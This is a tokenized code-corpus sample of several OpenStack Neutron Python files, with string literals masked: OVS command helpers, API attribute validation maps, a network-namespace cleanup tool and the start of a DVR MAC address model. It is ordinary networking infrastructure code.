context , '<STR_LIT>' , args = [ bridge , mode ] ) <EOL> def add_port ( self , bridge , port , may_exist = True ) : <EOL> opts = [ '<STR_LIT>' ] if may_exist else None <EOL> return BaseCommand ( self . context , '<STR_LIT>' , opts , [ bridge , port ] ) <EOL> def del_port ( self , port , bridge = None , if_exists = True ) : <EOL> opts = [ '<STR_LIT>' ] if if_exists else None <EOL> args = filter ( None , [ bridge , port ] ) <EOL> return BaseCommand ( self . context , '<STR_LIT>' , opts , args ) <EOL> def list_ports ( self , bridge ) : <EOL> return MultiLineCommand ( self . context , '<STR_LIT>' , args = [ bridge ] ) <EOL> def list_ifaces ( self , bridge ) : <EOL> return MultiLineCommand ( self . context , '<STR_LIT>' , args = [ bridge ] ) <EOL> def _set_colval_args ( * col_values ) : <EOL> args = [ ] <EOL> for entry in col_values : <EOL> if len ( entry ) == <NUM_LIT:2> : <EOL> col , op , val = entry [ <NUM_LIT:0> ] , '<STR_LIT:=>' , entry [ <NUM_LIT:1> ] <EOL> else : <EOL> col , op , val = entry <EOL> if isinstance ( val , collections . Mapping ) : <EOL> args += [ "<STR_LIT>" % ( <EOL> col , k , op , ovsdb . py_to_val ( v ) ) for k , v in val . items ( ) ] <EOL> elif ( isinstance ( val , collections . Sequence ) <EOL> and not isinstance ( val , six . string_types ) ) : <EOL> if len ( val ) == <NUM_LIT:0> : <EOL> args . append ( "<STR_LIT>" % ( col , op , "<STR_LIT>" ) ) <EOL> else : <EOL> args . append ( <EOL> "<STR_LIT>" % ( col , op , "<STR_LIT:U+002C>" . join ( map ( ovsdb . py_to_val , val ) ) ) ) <EOL> else : <EOL> args . append ( "<STR_LIT>" % ( col , op , ovsdb . py_to_val ( val ) ) ) <EOL> return args </s>
<s> import sys <EOL> from debtcollector import moves <EOL> from neutron_lib . api import converters as lib_converters <EOL> from neutron_lib . api import validators as lib_validators <EOL> from neutron_lib import constants <EOL> import six <EOL> import webob . exc <EOL> from neutron . _i18n import _ <EOL> from neutron . common import _deprecate <EOL> from neutron . common import constants as n_const <EOL> SHARED = '<STR_LIT>' <EOL> _deprecate . _DeprecateSubset . and_also ( '<STR_LIT>' , lib_validators ) <EOL> NAME_MAX_LEN = <NUM_LIT:255> <EOL> TENANT_ID_MAX_LEN = <NUM_LIT:255> <EOL> DESCRIPTION_MAX_LEN = <NUM_LIT:255> <EOL> LONG_DESCRIPTION_MAX_LEN = <NUM_LIT> <EOL> DEVICE_ID_MAX_LEN = <NUM_LIT:255> <EOL> DEVICE_OWNER_MAX_LEN = <NUM_LIT:255> <EOL> def _lib ( old_name ) : <EOL> """<STR_LIT>""" <EOL> new_func = getattr ( lib_validators , old_name , None ) <EOL> if not new_func : <EOL> new_func = getattr ( lib_validators , old_name [ <NUM_LIT:1> : ] , None ) <EOL> if not new_func : <EOL> new_func = getattr ( lib_converters , old_name , None ) <EOL> assert new_func <EOL> return moves . 
moved_function ( new_func , old_name , __name__ , <EOL> message = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , removal_version = '<STR_LIT>' ) <EOL> _verify_dict_keys = _lib ( '<STR_LIT>' ) <EOL> is_attr_set = _lib ( '<STR_LIT>' ) <EOL> _validate_list_of_items = _lib ( '<STR_LIT>' ) <EOL> _validate_values = _lib ( '<STR_LIT>' ) <EOL> _validate_not_empty_string_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_not_empty_string = _lib ( '<STR_LIT>' ) <EOL> _validate_string_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_string = _lib ( '<STR_LIT>' ) <EOL> validate_list_of_unique_strings = _lib ( '<STR_LIT>' ) <EOL> _validate_boolean = _lib ( '<STR_LIT>' ) <EOL> _validate_range = _lib ( '<STR_LIT>' ) <EOL> _validate_no_whitespace = _lib ( '<STR_LIT>' ) <EOL> _validate_mac_address = _lib ( '<STR_LIT>' ) <EOL> _validate_mac_address_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_ip_address = _lib ( '<STR_LIT>' ) <EOL> _validate_ip_pools = _lib ( '<STR_LIT>' ) <EOL> _validate_fixed_ips = _lib ( '<STR_LIT>' ) <EOL> _validate_nameservers = _lib ( '<STR_LIT>' ) <EOL> _validate_hostroutes = _lib ( '<STR_LIT>' ) <EOL> _validate_ip_address_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_subnet = _lib ( '<STR_LIT>' ) <EOL> _validate_subnet_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_subnet_list = _lib ( '<STR_LIT>' ) <EOL> _validate_regex = _lib ( '<STR_LIT>' ) <EOL> _validate_regex_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_subnetpool_id = _lib ( '<STR_LIT>' ) <EOL> _validate_subnetpool_id_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_uuid = _lib ( '<STR_LIT>' ) <EOL> _validate_uuid_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_uuid_list = _lib ( '<STR_LIT>' ) <EOL> _validate_dict_item = _lib ( '<STR_LIT>' ) <EOL> _validate_dict = _lib ( '<STR_LIT>' ) <EOL> _validate_dict_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_dict_or_empty = _lib ( '<STR_LIT>' ) <EOL> _validate_dict_or_nodata = _lib ( '<STR_LIT>' ) <EOL> _validate_non_negative = _lib ( '<STR_LIT>' ) <EOL> 
convert_to_boolean = _lib ( '<STR_LIT>' ) <EOL> convert_to_boolean_if_not_none = _lib ( '<STR_LIT>' ) <EOL> convert_to_int = _lib ( '<STR_LIT>' ) <EOL> convert_to_int_if_not_none = _lib ( '<STR_LIT>' ) <EOL> convert_to_positive_float_or_none = _lib ( '<STR_LIT>' ) <EOL> convert_kvp_str_to_list = _lib ( '<STR_LIT>' ) <EOL> convert_kvp_list_to_dict = _lib ( '<STR_LIT>' ) <EOL> convert_none_to_empty_list = _lib ( '<STR_LIT>' ) <EOL> convert_none_to_empty_dict = _lib ( '<STR_LIT>' ) <EOL> convert_to_list = _lib ( '<STR_LIT>' ) <EOL> _deprecate . _DeprecateSubset . and_also ( '<STR_LIT>' , lib_validators ) <EOL> _deprecate . _DeprecateSubset . and_also ( '<STR_LIT>' , lib_validators ) <EOL> NETWORK = '<STR_LIT>' <EOL> NETWORKS = '<STR_LIT>' % NETWORK <EOL> PORT = '<STR_LIT:port>' <EOL> PORTS = '<STR_LIT>' % PORT <EOL> SUBNET = '<STR_LIT>' <EOL> SUBNETS = '<STR_LIT>' % SUBNET <EOL> SUBNETPOOL = '<STR_LIT>' <EOL> SUBNETPOOLS = '<STR_LIT>' % SUBNETPOOL <EOL> RESOURCE_ATTRIBUTE_MAP = { <EOL> NETWORKS : { <EOL> '<STR_LIT:id>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:primary_key>' : True } , <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : NAME_MAX_LEN } , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : [ ] , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : True , <EOL> '<STR_LIT>' : lib_converters . 
convert_to_boolean , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT:status>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : TENANT_ID_MAX_LEN } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> SHARED : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> } , <EOL> PORTS : { <EOL> '<STR_LIT:id>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:primary_key>' : True } , <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , '<STR_LIT:default>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : NAME_MAX_LEN } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : True , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : <EOL> lib_converters . 
convert_kvp_list_to_dict , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : DEVICE_ID_MAX_LEN } , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : DEVICE_OWNER_MAX_LEN } , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : TENANT_ID_MAX_LEN } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT:status>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } , <EOL> } , <EOL> SUBNETS : { <EOL> '<STR_LIT:id>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:primary_key>' : True } , <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , '<STR_LIT:default>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : NAME_MAX_LEN } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : lib_converters . convert_to_int , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ <NUM_LIT:4> , <NUM_LIT:6> ] } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : lib_converters . 
convert_to_int , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> lib_converters . convert_none_to_empty_list , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> lib_converters . convert_none_to_empty_list , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : TENANT_ID_MAX_LEN } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : True , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : n_const . IPV6_MODES } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : constants . 
ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <EOL> n_const . IPV6_MODES } , <EOL> '<STR_LIT>' : True } , <EOL> SHARED : { '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> } , <EOL> SUBNETPOOLS : { <EOL> '<STR_LIT:id>' : { '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:primary_key>' : True } , <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : TENANT_ID_MAX_LEN } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : lib_converters . convert_to_int , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : lib_converters . convert_to_int , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : lib_converters . 
convert_to_int , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : lib_converters . convert_to_int , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> SHARED : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> } <EOL> } <EOL> RESOURCE_FOREIGN_KEYS = { <EOL> NETWORKS : '<STR_LIT>' <EOL> } <EOL> PLURALS = { NETWORKS : NETWORK , <EOL> PORTS : PORT , <EOL> SUBNETS : SUBNET , <EOL> SUBNETPOOLS : SUBNETPOOL , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> REVERSED_PLURALS = { } <EOL> def get_collection_info ( collection ) : <EOL> """<STR_LIT>""" <EOL> return RESOURCE_ATTRIBUTE_MAP . get ( collection ) <EOL> def get_resource_info ( resource ) : <EOL> """<STR_LIT>""" <EOL> plural_name = REVERSED_PLURALS . get ( resource ) <EOL> if not plural_name : <EOL> for ( plural , singular ) in PLURALS . items ( ) : <EOL> if singular == resource : <EOL> plural_name = plural <EOL> REVERSED_PLURALS [ resource ] = plural_name <EOL> return RESOURCE_ATTRIBUTE_MAP . get ( plural_name ) <EOL> def fill_default_value ( attr_info , res_dict , <EOL> exc_cls = ValueError , <EOL> check_allow_post = True ) : <EOL> for attr , attr_vals in six . 
iteritems ( attr_info ) : <EOL> if attr_vals [ '<STR_LIT>' ] : <EOL> if '<STR_LIT:default>' not in attr_vals and attr not in res_dict : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % attr <EOL> raise exc_cls ( msg ) <EOL> res_dict [ attr ] = res_dict . get ( attr , <EOL> attr_vals . get ( '<STR_LIT:default>' ) ) <EOL> elif check_allow_post : <EOL> if attr in res_dict : <EOL> msg = _ ( "<STR_LIT>" ) % attr <EOL> raise exc_cls ( msg ) <EOL> def convert_value ( attr_info , res_dict , exc_cls = ValueError ) : <EOL> for attr , attr_vals in six . iteritems ( attr_info ) : <EOL> if ( attr not in res_dict or <EOL> res_dict [ attr ] is constants . ATTR_NOT_SPECIFIED ) : <EOL> continue <EOL> if '<STR_LIT>' in attr_vals : <EOL> res_dict [ attr ] = attr_vals [ '<STR_LIT>' ] ( res_dict [ attr ] ) <EOL> if '<STR_LIT>' not in attr_vals : <EOL> continue <EOL> for rule in attr_vals [ '<STR_LIT>' ] : <EOL> res = lib_validators . validators [ rule ] ( res_dict [ attr ] , <EOL> attr_vals [ '<STR_LIT>' ] [ rule ] ) <EOL> if res : <EOL> msg_dict = dict ( attr = attr , reason = res ) <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % msg_dict <EOL> raise exc_cls ( msg ) <EOL> def populate_tenant_id ( context , res_dict , attr_info , is_create ) : <EOL> if ( ( '<STR_LIT>' in res_dict and <EOL> res_dict [ '<STR_LIT>' ] != context . tenant_id and <EOL> not context . is_admin ) ) : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise webob . exc . HTTPBadRequest ( msg ) <EOL> if is_create and '<STR_LIT>' not in res_dict : <EOL> if context . tenant_id : <EOL> res_dict [ '<STR_LIT>' ] = context . tenant_id <EOL> elif '<STR_LIT>' in attr_info : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise webob . exc . HTTPBadRequest ( msg ) <EOL> def verify_attributes ( res_dict , attr_info ) : <EOL> extra_keys = set ( res_dict . keys ( ) ) - set ( attr_info . keys ( ) ) <EOL> if extra_keys : <EOL> msg = _ ( "<STR_LIT>" ) % '<STR_LIT:U+002CU+0020>' . 
join ( extra_keys ) <EOL> raise webob . exc . HTTPBadRequest ( msg ) <EOL> _OLD_REF = sys . modules [ __name__ ] <EOL> sys . modules [ __name__ ] = _deprecate . _DeprecateSubset ( globals ( ) , constants ) </s>
<s> import itertools <EOL> import re <EOL> import time <EOL> from neutron_lib import constants <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import importutils <EOL> from neutron . _i18n import _ , _LE <EOL> from neutron . agent . common import config as agent_config <EOL> from neutron . agent . common import ovs_lib <EOL> from neutron . agent . dhcp import config as dhcp_config <EOL> from neutron . agent . l3 import agent as l3_agent <EOL> from neutron . agent . l3 import dvr <EOL> from neutron . agent . l3 import dvr_fip_ns <EOL> from neutron . agent . linux import dhcp <EOL> from neutron . agent . linux import external_process <EOL> from neutron . agent . linux import interface <EOL> from neutron . agent . linux import ip_lib <EOL> from neutron . common import config <EOL> LOG = logging . getLogger ( __name__ ) <EOL> LB_NS_PREFIX = '<STR_LIT>' <EOL> NS_PREFIXES = { <EOL> '<STR_LIT>' : [ dhcp . NS_PREFIX ] , <EOL> '<STR_LIT>' : [ l3_agent . NS_PREFIX , dvr . SNAT_NS_PREFIX , dvr_fip_ns . FIP_NS_PREFIX ] , <EOL> '<STR_LIT>' : [ LB_NS_PREFIX ] , <EOL> } <EOL> class FakeDhcpPlugin ( object ) : <EOL> """<STR_LIT>""" <EOL> def __getattribute__ ( self , name ) : <EOL> def fake_method ( * args ) : <EOL> pass <EOL> return fake_method <EOL> def setup_conf ( ) : <EOL> """<STR_LIT>""" <EOL> cli_opts = [ <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = _ ( '<STR_LIT>' ) ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> choices = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> help = _ ( '<STR_LIT>' ) ) , <EOL> ] <EOL> conf = cfg . CONF <EOL> conf . register_cli_opts ( cli_opts ) <EOL> agent_config . register_interface_driver_opts_helper ( conf ) <EOL> conf . register_opts ( dhcp_config . DHCP_AGENT_OPTS ) <EOL> conf . register_opts ( dhcp_config . DHCP_OPTS ) <EOL> conf . register_opts ( dhcp_config . DNSMASQ_OPTS ) <EOL> conf . register_opts ( interface . 
OPTS ) <EOL> return conf <EOL> def _get_dhcp_process_monitor ( config ) : <EOL> return external_process . ProcessMonitor ( config = config , <EOL> resource_type = '<STR_LIT>' ) <EOL> def kill_dhcp ( conf , namespace ) : <EOL> """<STR_LIT>""" <EOL> network_id = namespace . replace ( dhcp . NS_PREFIX , '<STR_LIT>' ) <EOL> dhcp_driver = importutils . import_object ( <EOL> conf . dhcp_driver , <EOL> conf = conf , <EOL> process_monitor = _get_dhcp_process_monitor ( conf ) , <EOL> network = dhcp . NetModel ( { '<STR_LIT:id>' : network_id } ) , <EOL> plugin = FakeDhcpPlugin ( ) ) <EOL> if dhcp_driver . active : <EOL> dhcp_driver . disable ( ) <EOL> def eligible_for_deletion ( conf , namespace , force = False ) : <EOL> """<STR_LIT>""" <EOL> if conf . agent_type : <EOL> prefixes = NS_PREFIXES . get ( conf . agent_type ) <EOL> else : <EOL> prefixes = itertools . chain ( * NS_PREFIXES . values ( ) ) <EOL> ns_mangling_pattern = '<STR_LIT>' % ( '<STR_LIT:|>' . join ( prefixes ) , <EOL> constants . UUID_PATTERN ) <EOL> if not re . match ( ns_mangling_pattern , namespace ) : <EOL> return False <EOL> ip = ip_lib . IPWrapper ( namespace = namespace ) <EOL> return force or ip . namespace_is_empty ( ) <EOL> def unplug_device ( conf , device ) : <EOL> orig_log_fail_as_error = device . get_log_fail_as_error ( ) <EOL> device . set_log_fail_as_error ( False ) <EOL> try : <EOL> device . link . delete ( ) <EOL> except RuntimeError : <EOL> device . set_log_fail_as_error ( orig_log_fail_as_error ) <EOL> ovs = ovs_lib . BaseOVS ( ) <EOL> bridge_name = ovs . get_bridge_for_iface ( device . name ) <EOL> if bridge_name : <EOL> bridge = ovs_lib . OVSBridge ( bridge_name ) <EOL> bridge . delete_port ( device . name ) <EOL> else : <EOL> LOG . debug ( '<STR_LIT>' , device . name ) <EOL> finally : <EOL> device . set_log_fail_as_error ( orig_log_fail_as_error ) <EOL> def destroy_namespace ( conf , namespace , force = False ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ip = ip_lib . 
IPWrapper ( namespace = namespace ) <EOL> if force : <EOL> kill_dhcp ( conf , namespace ) <EOL> if ip . netns . exists ( namespace ) : <EOL> for device in ip . get_devices ( exclude_loopback = True ) : <EOL> unplug_device ( conf , device ) <EOL> ip . garbage_collect_namespace ( ) <EOL> except Exception : <EOL> LOG . exception ( _LE ( '<STR_LIT>' ) , namespace ) <EOL> def cleanup_network_namespaces ( conf ) : <EOL> candidates = [ ns for ns in <EOL> ip_lib . IPWrapper . get_namespaces ( ) <EOL> if eligible_for_deletion ( conf , ns , conf . force ) ] <EOL> if candidates : <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> for namespace in candidates : <EOL> destroy_namespace ( conf , namespace , conf . force ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> conf = setup_conf ( ) <EOL> conf ( ) <EOL> config . setup_logging ( ) <EOL> cleanup_network_namespaces ( conf ) </s>
<s> from neutron_lib import constants <EOL> from neutron_lib import exceptions as n_exc <EOL> from oslo_config import cfg <EOL> from oslo_db import exception as db_exc <EOL> from oslo_log import helpers as log_helpers <EOL> from oslo_log import log as logging <EOL> import sqlalchemy as sa <EOL> from sqlalchemy import or_ <EOL> from sqlalchemy . orm import exc <EOL> from neutron . _i18n import _ , _LE <EOL> from neutron . callbacks import events <EOL> from neutron . callbacks import registry <EOL> from neutron . callbacks import resources <EOL> from neutron . common import utils <EOL> from neutron . db import model_base <EOL> from neutron . db import models_v2 <EOL> from neutron . extensions import dvr as ext_dvr <EOL> from neutron . extensions import portbindings <EOL> from neutron import manager <EOL> LOG = logging . getLogger ( __name__ ) <EOL> dvr_mac_address_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = "<STR_LIT>" , <EOL> help = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) , <EOL> ] <EOL> cfg . CONF . register_opts ( dvr_mac_address_opts ) <EOL> class DistributedVirtualRouterMacAddress ( model_base . BASEV2 ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> host = sa . Column ( sa . String ( <NUM_LIT:255> ) , primary_key = True , nullable = False ) <EOL> mac_address = sa . Column ( sa . String ( <NUM_LIT:32> ) , nullable = False , unique = True ) <EOL> def _delete_mac_associated_with_agent ( resource , event , trigger , context , agent , <EOL> ** kwargs ) : <EOL> host = agent [ '<STR_LIT:host>' ] <EOL> plugin = manager . NeutronManager . get_plugin ( ) <EOL> if [ a for a in plugin . get_agents ( context , filters = { '<STR_LIT:host>' : [ host ] } ) <EOL> if a [ '<STR_LIT:id>' ] != agent [ '<STR_LIT:id>' ] ] : <EOL> return <EOL> try : <EOL> with context . session . 
